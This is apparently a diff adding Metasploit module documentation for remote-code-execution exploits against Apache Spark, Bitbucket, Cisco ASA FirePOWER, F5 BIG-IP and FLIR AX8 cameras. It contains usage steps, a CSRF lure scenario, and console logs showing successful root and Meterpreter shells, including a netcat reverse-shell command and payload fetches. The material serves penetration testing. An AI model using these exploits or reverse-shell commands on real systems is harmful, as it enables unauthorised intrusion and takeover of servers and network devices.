+### Apache Spark version 3.1.1 on Linux 5.10.104-linuxkit WITHOUT the spark.acls.enable option
+
+Note: This version is vulnerable, however the `spark.acls.enable` option is not set, hence the vulnerable code will not be triggered.
+Response on POST payload request will be 200 instead of 403.
+
+```
+msf6 > use exploit/linux/http/apache_spark_rce_cve_2022_33891
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > set rhosts 192.168.100.43
+rhosts => 192.168.100.43
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) > options
+
+Module options (exploit/linux/http/apache_spark_rce_cve_2022_33891):
+
+   Name       Current Setting  Required  Description
+   ----       ---------------  --------  -----------
+   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS     192.168.100.43   yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT      8080             yes       The target port (TCP)
+   SSL        false            no        Negotiate SSL/TLS for outgoing connections
+   TARGETURI  /                yes       The URI of the vulnerable instance
+   VHOST                       no        HTTP server virtual host
+
+
+Payload options (cmd/unix/python/meterpreter/reverse_tcp):
+
+   Name   Current Setting  Required  Description
+   ----   ---------------  --------  -----------
+   LHOST  192.168.100.7    yes       The listen address (an interface may be specified)
+   LPORT  4444             yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix (In-Memory)
+
+
+msf6 exploit(inux/http/apache_spark_rce_cve_2022_33891) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.43:8080 can be exploited!
+[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. The 192.168.100.43:8080 did not respond a 403 response. "set ForceExploit true" to override check result.
+[*] Exploit completed, but no session was created.
+msf6 exploit(linux/http/apache_spark_rce_cve_2022_33891) >
+```
+
+## Limitations
+The check to determine if the application is vulnerable is based on a 403 response and the execution of a randomized `sleep` command.
+The exploit is a blind command injection, so there is nothing reflected back on the page during the command execution.
+Timing the sleep command execution is therefore a pretty safe bet to check if the command injection is successful.
+
+Credits goes to HuskyHacks that used this test in his [POC](https://github.com/HuskyHacks/cve-2022-33891) on GitHub.
@@ -0,0 +1,118 @@
+## Vulnerable Application
+
+Various versions of Bitbucket Server and Data Center are vulnerable to
+an unauthenticated command injection vulnerability in multiple API endpoints.
+
+The `/rest/api/latest/projects/{projectKey}/repos/{repositorySlug}/archive` endpoint
+creates an archive of the repository, leveraging the `git-archive` command to do so.
+Supplying NULL bytes to the request enables the passing of additional arguments to the
+command, ultimately enabling execution of arbitrary commands.
+
+According to the [advisory](https://confluence.atlassian.com/bitbucketserver/bitbucket-server-and-data-center-advisory-2022-08-24-1155489835.html), vulnerable versions of Bitbucket are:
+
+  Any version released after version `6.10.17` and before:
+          * `7.6.17`
+          * `7.17.10`
+          * `7.21.4`
+          * `8.0.3`
+          * `8.1.3`
+          * `8.2.2`
+          * `8.3.1`
+
+Download archives can be found [here](https://www.atlassian.com/software/bitbucket/download-archives).
+    
+### Installation Instructions
+
+1. Install Git on the target machine
+  * sudo apt install -y git
+2. Download a vulnerable version of Bitbucket. For example, version `8.2.1` can be found
+[here](https://www.atlassian.com/software/stash/downloads/binary/atlassian-bitbucket-8.2.1-x64.bin)
+3. Make sure the resulting bin file is executable and run it
+  * chmod +x atlassian-bitbucket-8.3.0-x64.bin && sudo ./atlassian-bitbucket-8.3.0-x64.bin
+4. An installation wizard will pop up. Make sure `Install a new instance` is checked, then click `Next`
+5. Check `Install a Server instance` and click `Next`
+6. If the default destination directory looks good, click `Next`
+7. Click `Next` if the default Bitbucket data directory looks fine
+8. Make sure the `Use default HTTP port (7990)` selection is checked and click `Next`
+9. Make sure the `Install Bitbucket as a service` box is checked and click `Next`
+10. Click `Install` if everything looks correct on the summary screen
+11. Once the installation completes, make sure the `Would you like to launch Bitbucket` option is selected
+and click `Next`
+12. Ensure `Launch Bitbucket <version> in browser` is selected and click `Finish`
+13. Navigate to the Bitbucket setup page (http://localhost:7990) and select the `I need an evaluation license` option
+14. If you already have an account, select `I have an account`; otherwise, create a new account
+15. 'up and running' should be selected on the next page, so click `Generate License`
+16. Confirm that the prompt gives you the correct server, then click `Yes`
+17. The license should be entered in the box, so select `Next`
+18. Finally, set up an administrator account
+
+*Note*: If an error occurs on the last step, just open a browser and navigate to the setup
+page at 127.0.0.1:7990
+
+### Vulnerable Setup
+
+1. Log into Bitbucket with your administrator credentials
+2. Once logged in, select `Projects` at the top menu
+3. Select `Create project`
+4. Enter a name for the project and click `Create project`
+5. On the next page, select `Create repository`
+6. Enter a name for the repository and select `Create repository`
+7. Follow the instructions to clone the repository and push data to the repository so it is not empty
+8. Click the gear on the left side of the next page
+9. Select `Repository permissions` under `Security` on the left
+10. Underneath `Public access`, check `Enable` to make the repository public
+
+Bitbucket should now be exploitable
+
+## Verification Steps
+
+1. Install the application
+2. Start msfconsole
+3. Do: `use exploit/linux/http/bitbucket_git_cmd_injection`
+4. Do: `run`
+5. You should get a shell.
+
+## Options
+
+### USERNAME
+
+An optional username to authenticate to Bitbucket with
+
+### PASSWORD
+
+An optional password to authenticate to Bitbucket with
+
+### Bitbucket version 8.2.1 on Ubuntu 22.04
+
+```
+msf6 > use exploit/linux/http/bitbucket_git_cmd_injection
+[*] Using configured payload linux/x64/meterpreter/reverse_tcp
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set rhost 192.168.140.216
+rhost => 192.168.140.216
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > set lhost 192.168.140.1
+lhost => 192.168.140.1
+msf6 exploit(linux/http/bitbucket_git_cmd_injection) > run
+
+[*] Started reverse TCP handler on 192.168.140.1:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target appears to be vulnerable.
+[*] Searching Bitbucket for publicly accessible repository
+[+] Found public repo 'repo_name' in project 'TEST'!
+[*] Using URL: http://192.168.140.1:8080/7SGXRWRlXr8t
+[*] Client 192.168.140.216 (Wget/1.21.2) requested /7SGXRWRlXr8t
+[*] Sending payload to 192.168.140.216 (Wget/1.21.2)
+[*] Sending stage (3020772 bytes) to 192.168.140.216
+[*] Meterpreter session 1 opened (192.168.140.1:4444 -> 192.168.140.216:57994) at 2022-09-20 18:40:27 -0500
+[*] Command Stager progress - 100.00% done (118/118 bytes)
+[*] Server stopped.
+
+meterpreter > getuid
+Server username: atlbitbucket
+meterpreter > sysinfo
+Computer     : 192.168.140.216
+OS           : Ubuntu 22.04 (Linux 5.15.0-48-generic)
+Architecture : x64
+BuildTuple   : x86_64-linux-musl
+Meterpreter  : x64/linux
+meterpreter >
+```
@@ -0,0 +1,152 @@
+## Vulnerable Application
+
+### Description
+
+This module exploits an authenticated command injection vulnerability affecting
+Cisco ASA-X with FirePOWER Services. This exploit is executed through the ASA's
+ASDM web server and lands in the FirePower Services SFR module's Linux virtual
+machine as the root user. Access to the virtual machine allows the attacker to
+pivot to the inside network, and access the outside network. Also, the SFR
+virtual machine is running snort on the traffic flowing through the ASA, so
+the attacker should have access to this diverted traffic as well.
+
+This module requires ASDM credentials in order to traverse the ASDM interface.
+A similar attack can be performed via Cisco CLI (over SSH), although that isn't
+implemented here. This attack also assumes the module is installed and
+configured.
+
+Finally, it's worth noting that this attack bypasses the effects of the
+`lockdown-sensor` command (e.g. the virtual machine's bash shell shouldn't be
+available but this attack makes it available).
+
+Cisco assigned this issue CVE-2022-20828. The issue affects all Cisco ASA that
+support the ASA FirePOWER module (at least Cisco ASA-X with FirePOWER Service,
+and Cisco ISA 3000). The vulnerability has been patched in ASA FirePOWER module
+versions 6.2.3.19, 6.4.0.15, 6.6.7, and 7.0.21. The following versions will
+receive no patch: 6.2.2 and earlier, 6.3.*, 6.5.*, and 6.7.*.
+
+### Setup
+
+Cisco ASA that support the FirePOWER Services module are, to our knowledge,
+strictly hardware firewalls and not capable of being emulated. As such,
+testing requires a physical device. Once a device is acquired, you'll
+additionally need access to Cisco downloads of ASDM, ASA software, and the
+FirePOWER Services Software for ASA. Unfortunately, Cisco hides these
+behind a paywall (or a "contract" wall).
+
+However, if you do acquire a Cisco ASA that supports the FirePOWER Services
+module, then it will likely come with the module pre-installed. These systems
+do support downgrading of the module via uninstall and reinstallation. If
+you need to follow that course, then I found the following [guide](https://www.cisco.com/c/en/us/support/docs/security/asa-firepower-services/118644-configure-firepower-00.html#anc5) to be an excellent guide that
+demonstrates how to install the FirePOWER module from boot image through
+full installation.
+
+This particular module exploits the FirePOWER module via ASDM, so you'll need
+that installed and running as well. Likely, the ASA will have an ASDM binary
+package already installed, but if not you'll need to download that from Cisco
+and copy it onto the ASA. However, once that is complete, you can run the
+following commands to start ASDM and enable it on the inside/outside network.
+
+```
+asdm image disk0:/asdm<version>.bin
+http server enable
+http network mask inside
+http network mask outside
+```
+
+Where network and mask are who you want to be able to access it and inside
+is the zone. E.g. "0.0.0.0 0.0.0.0 outside" is the internet. And that should
+satisfy the pre-requisites for exploitation (ASDM+sfr).
+
+## Verification Steps
+
+* Follow setup steps above.
+* Do: `use exploit/linux/http/cisco_asax_sfr_rce`
+* Do: `set USERNAME <username>`
+* Do: `set PASSWORD <password>`
+* Do: `set RHOST <ip>`
+* Do: `set LHOST <ip>`
+* Do: `check`
+* Verify the remote host is vulnerable.
+* Do: `run`
+* Verify the module acquires a root shell
+
+## Options
+
+### USERNAME
+
+The username to authenticate with the ASDM http web server with.
+
+### PASSWORD
+
+The password to authenticate with the ASDM http web server with.
+
+## Scenarios
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a root shell
+
+```
+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Shell Dropper for cmd/unix/reverse_bash
+[*] Command shell session 1 opened (10.0.0.2:4444 -> 10.0.0.21:43056 ) at 2022-04-21 12:49:15 -0700
+
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```
+
+### Successful exploitation of ASA 5506-X with FirePOWER Services for a Meterpreter shell
+
+```
+msf6 > use exploit/linux/http/cisco_asax_sfr_rce
+[*] Using configured payload cmd/unix/reverse_bash
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set USERNAME admin
+USERNAME => admin
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set PASSWORD labpass1
+PASSWORD => labpass1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set LHOST 10.0.0.2
+LHOST => 10.0.0.2
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set RHOST 10.0.0.21
+RHOST => 10.0.0.21
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > check
+[+] 10.0.0.21:443 - The target is vulnerable. Successfully executed the 'id' command.
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > set TARGET 1
+TARGET => 1
+msf6 exploit(linux/http/cisco_asax_sfr_rce) > run
+
+[*] Started reverse TCP handler on 10.0.0.2:4444 
+[*] Running automatic check ("set AutoCheck false" to disable)
+[+] The target is vulnerable. Successfully executed the 'id' command.
+[*] Executing Linux Dropper for linux/x64/meterpreter_reverse_tcp
+[*] Using URL: http://10.0.0.2:8080/FeB2t5vKpa
+[*] Client 10.0.0.21 (curl/7.48.0) requested /FeB2t5vKpa
+[*] Sending payload to 10.0.0.21 (curl/7.48.0)
+[*] Meterpreter session 2 opened (10.0.0.2:4444 -> 10.0.0.21:43058 ) at 2022-04-21 12:51:44 -0700
+[*] Command Stager progress - 100.00% done (111/111 bytes)
+[*] Server stopped.
+
+meterpreter > shell
+Process 6315 created.
+Channel 1 created.
+id
+uid=0(root) gid=0(root) groups=0(root)
+uname -a
+Linux firepower 3.10.107sf.cisco-1 #1 SMP PREEMPT Thu Mar 8 18:29:04 UTC 2018 x86_64 GNU/Linux
+```
@@ -0,0 +1,61 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800`
+4. Do `set RHOST <target>` / `set HttpUsername admin` / `set HttpPassword <thepasswordyouchose>`
+5. Do: `run`
+6. You should get a session
+
+## Options
+
+### `HttpUsername` / `HttpPassword`
+
+The account to authorize as - requires console access. The `admin` account (which
+is the default `HttpUsername`) works great, if you have the password.
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1
+
+This should be the normal experience:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800
+[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set RHOST 10.0.0.162
+RHOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set HttpPassword iagotestbigip
+HttpPassword => mybigippassword
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > set VERBOSE true
+VERBOSE => true
+
+msf6 exploit(linux/http/f5_icontrol_rpmspec_rce_cve_2022_41800) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[*] Creating an .rpmspec file on the target...
+[*] Created spec file: /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[*] Building the RPM to trigger the payload...
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/config/rest/node/tmp/2fadbb5d-ed94-4b23-ba57-2f0d273d2bdc.spec
+[+] Deleted /var/config/rest/node/tmp/RPMS/noarch/wOXt3-4.1.3-0.8.6.noarch.rpm
+[*] Meterpreter session 2 opened (10.0.0.179:4444 -> 10.0.0.162:38556) at 2022-11-14 15:14:23 -0800
+
+meterpreter > getuid
+Server username: root
+```
@@ -0,0 +1,217 @@
+## Vulnerable Application
+
+The vulnerable application is F5 Big-IP version 17.0.0.1 and below. It can be
+downloaded as a VMWare image for free (you have to create an account) from
+https://downloads.f5.com. You can register for a free 30-day trial if you like,
+but it's not required to test this.
+
+Boot the VM and set an admin password by logging in with the default credentials
+(admin / admin). You'll need that password.
+
+## Verification Steps
+
+This is a CSRF vuln, so it requires a browser in addition to msf:
+
+1. Install the application
+2. Start `msfconsole`
+3. Do: `use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622`
+4. Do `set TARGET_HOST <target>` / `set LHOST <yourtest>`
+5. Do: `run`
+6. You should get a url such as: `http://10.0.0.179:8080/ddgjZO`
+7. Open a browser and visit that URL
+8. If you don't already have an HTTP Basic session, it'll ask for your credentials (the `admin` account from earlier works great)
+
+## Options
+
+### `TARGET_HOST` / `TARGET_URI` / `TARGET_SSL`
+
+These are the target that the user will be redirected to
+
+### `FILENAME`
+
+If the `TARGET` is `2` (`Custom`), the file that will be overwritten with the payload
+
+## Scenarios
+
+### F5 Big-IP 17.0.0.1 - Target 0 (Restart)
+
+Start the listener:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
+[*] Server started.
+```
+
+Then, a legit user that has HTTP Basic authentication (or who can be tricked
+into performing HTTP Basic authentication) needs to visit that URL. When any
+user connects, they'll be redirected to the SOAP endpoint and you'll see:
+
+```
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/LXsNzhG6zMdQ
+[*] Server started.
+
+[... wait for a user to visit the URL ...]
+
+[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
+```
+
+We have no way to tell whether this was successful; however, if we already have
+access to the target (ie, if you're testing this), we can check if the file was
+successfully planted:
+
+```
+[root@bigip:Active:Standalone] config # cat /shared/f5_update_action 
+UpdateAction
+https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+https://localhost/error
+0
+0
+0
+0
+```
+
+The code planted there will activate at reboot. So, ...wait till the target
+reboots. Perhaps when they update! Again, if you have shell access, you can
+check the log file when it boots:
+
+```
+[root@bigip:INOPERATIVE:] config # tail -f /var/log/f5_update_checker.out
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file found -- parsing
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file action: "UpdateAction"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file success URL: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file failure URL: "https://localhost/error"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess flag: "8"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnSuccess slot: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure flag: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: EM callback file rebootOnFailure slot: "0"
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Executing EM action: UpdateAction
+[Mon Nov 14 15:26:02 2022] f5em_callback [INFO]: Sleeping for 2 minutes before first attempt.
+[...wait 2 minutes...]
+[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Finished sleeping.
+[Mon Nov 14 15:28:02 2022] f5em_callback [INFO]: Attempting to connect to EM server: "https://localhost/success`echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+And, on Metasploit:
+
+```
+[*] Redirecting the admin to overwrite /shared/f5_update_action; if successful, your session will come approximately 2 minutes after the target is rebooted
+[...wait 2 minutes...]
+[*] Sending stage (40164 bytes) to 10.0.0.162
+[+] Deleted /var/log/f5_update_checker.out
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:51388) at 2022-11-14 15:28:04 -0800
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > sessions -i 1
+[*] Starting interaction with 1...
+
+meterpreter > getuid
+Server username: root
+```
+
+### F5 Big-IP 17.0.0.1 - Target 1 (Login)
+
+This works similarly.. use the module, set the `TARGET_HOST`, and set the
+`TARGET` to `1`:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 1
+TARGET => 1
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/ePg5ECHuVD
+[*] Server started.
+
+[...wait for an authenticated user to click the link...]
+
+[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
+```
+
+Once again, if you already have access, you can verify it worked:
+
+```
+[root@bigip:Active:Standalone] config # cat /etc/profile.d/timeout.sh 
+echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+Then, when a user logs in (ie, `ssh root@<target>` or on the console), you get
+a session:
+
+```
+[*] Redirecting the admin to overwrite /var/run/config/timeout.sh; if successful, your session will come the next time a user logs in interactively
+
+[...wait for a user to log in..]
+
+[*] Sending stage (40168 bytes) to 10.0.0.162
+[+] Deleted /var/run/config/timeout.sh
+[*] Meterpreter session 1 opened (10.0.0.179:4444 -> 10.0.0.162:43902) at 2022-11-14 15:32:26 -0800
+
+meterpreter > getuid
+Server username: root
+```
+
+### F5 Big-IP 17.0.0.1 - Target 2 (Custom)
+
+Once again, set up the server:
+
+```
+msf6 > use exploit/linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622
+[*] Using configured payload cmd/unix/python/meterpreter/reverse_tcp
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET_HOST 10.0.0.162
+TARGET_HOST => 10.0.0.162
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set LHOST 10.0.0.179
+LHOST => 10.0.0.179
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set TARGET 2
+TARGET => 2
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > set FILENAME /tmp/testmsfmodule
+FILENAME => /tmp/testmsfmodule
+
+msf6 exploit(linux/http/f5_icontrol_soap_csrf_rce_cve_2022_41622) > exploit
+[*] Started reverse TCP handler on 10.0.0.179:4444 
+[+] Starting HTTP server; an administrator with an active HTTP Basic session will need to load the URL below
+[*] Using URL: http://10.0.0.179:8080/PLvOVjkiVvXX
+[*] Server started.
+
+[...wait for an admin to visit that link...]
+
+[*] Redirecting the admin to overwrite /tmp/testmsfmodule with the payload
+```
+
+You can verify the file exists:
+
+```
+# cat /tmp/testmsfmodule 
+echo exec\(__import__\(\'base64\'\).b64decode[...]
+```
+
+Note that while this is written by root, you're in a pretty strict SELinux
+context so most obvious attacks (like writing to /etc/profile.d, /root/.ssh,
+etc., won't work).
@@ -0,0 +1,180 @@
+## Vulnerable Application
+
+FLIR AX8 is a thermal sensor with imaging capabilities, combining thermal and visual cameras
+that provides continuous temperature monitoring and alarming for critical electrical and mechanical equipment.
+This device is typically used for monitoring industrial environments in a LAN based configuration.
+Occasionally you can find a FLIR AX8 device where the HTTP web interface is exposed to the public internet.
+
+FLIR AX8 is affected by an unauthenticated remote command injection vulnerability.
+This can be exploited to inject and execute arbitrary shell commands as the root user through the `id` HTTP POST parameter
+in `res.php` endpoint.
+A successful exploit could allow the attacker to execute arbitrary commands on the underlying operating system with the root privileges.
+This issue affects all FLIR AX8 thermal sensor cameras version up to and including `1.46.16`.
+
+The endpoint `/res.php` can be called remotely without user authentication as there is no cookie verification `Cookie: PHPSESSID=ID`
+to check if the request is legitimate. The second problem is that the POST parameter id can be injected to execute any unix command.
+
+Installing a vulnerable test bed requires a FLIR AX8 camera with the vulnerable firmware loaded.
+
+This module has been tested against a FLIR AX8 camera with the specifications listed below:
+
+* FLIR AX8 thermal camera
+* Firmware v1.40.16
+
+## Verification Steps
+
+1. `use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061`
+1. `set RHOSTS <TARGET HOSTS>`
+1. `set RPORT <port>`
+1. `set LHOST <attacker host ip>`
+1. `set LPORT <attacker host port>`
+1. `set TARGET <0-Unix command or 1-Linux Dropper>`
+1. `exploit`
+1. You should get a `netcat` shell or `meterpreter` session depending on the target and payload settings.
+
+## Options
+No specific options.
+
+## Scenarios
+
+### FLIR AX8 netcat reverse shell
+
+```
+msf6 > use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
+[*] Using configured payload cmd/unix/reverse_netcat
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > options
+
+Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all add
+                                       resses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (cmd/unix/reverse_netcat):
+
+   Name   Current Setting    Required  Description
+   ----   ---------------    --------  -----------
+   LHOST                     yes       The listen address (an interface may be specified)
+   LPORT                     yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   0   Unix Command
+
+
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set target 0
+target => 0
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
+[*] Running automatic check ("set AutoCheck false" to disable)
+[*] Checking if 192.168.100.180:80 can be exploited!
+[*] Performing command injection test issuing a sleep command of 10 seconds.
+[*] Elapsed time: 10.947262728999704 seconds.
+[+] The target is vulnerable. Successfully tested command injection.
+[*] Executing Unix Command with mkfifo /tmp/eyhxvh; nc 192.168.100.7 4444 0</tmp/eyhxvh | /bin/sh >/tmp/eyhxvh 2>&1; rm /tmp/eyhxvh
+[*] Command shell session 1 opened (127.0.0.1:4444 -> 127.0.0.1:37980) at 2022-10-21 07:00:16 +0000
+
+whoami
+root
+uname -a
+Linux neco 3.0.35-flir #1 PREEMPT Thu Oct 20 08:20:20 CET 2022 armv7l GNU/Linux
+exit
+```
+
+### FLIR AX8 meterpreter session
+
+```
+msf6 > use exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061
+[*] Using configured payload linux/armle/meterpreter_reverse_tcp
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > options
+
+Module options (exploit/linux/http/flir_ax8_unauth_rce_cve_2022_37061):
+
+   Name     Current Setting  Required  Description
+   ----     ---------------  --------  -----------
+   Proxies                   no        A proxy chain of format type:host:port[,type:host:port][...]
+   RHOSTS                    yes       The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
+   RPORT    80               yes       The target port (TCP)
+   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to li>
+                                       resses.
+   SRVPORT  8080             yes       The local port to listen on.
+   SSL      false            no        Negotiate SSL/TLS for outgoing connections
+   SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)
+   URIPATH                   no        The URI to use for this exploit (default is random)
+   VHOST                     no        HTTP server virtual host
+
+
+Payload options (linux/armle/meterpreter_reverse_tcp):
+
+   Name   Current Setting    Required  Description
+   ----   ---------------    --------  -----------
+   LHOST                     yes       The listen address (an interface may be specified)
+   LPORT                     yes       The listen port
+
+
+Exploit target:
+
+   Id  Name
+   --  ----
+   1   Linux Dropper
+
+
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set rhosts 192.168.100.180
+rhosts => 192.168.100.180
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lhost 192.168.100.7
+lhost => 192.168.100.7
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set lport 4444
+lport => 4444
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > set target 1
+target => 1
+msf6 exploit(linux/http/flir_ax8_unauth_rce_cve_2022_37061) > exploit
+
+[*] Started reverse TCP handler on 192.168.100.7:4444
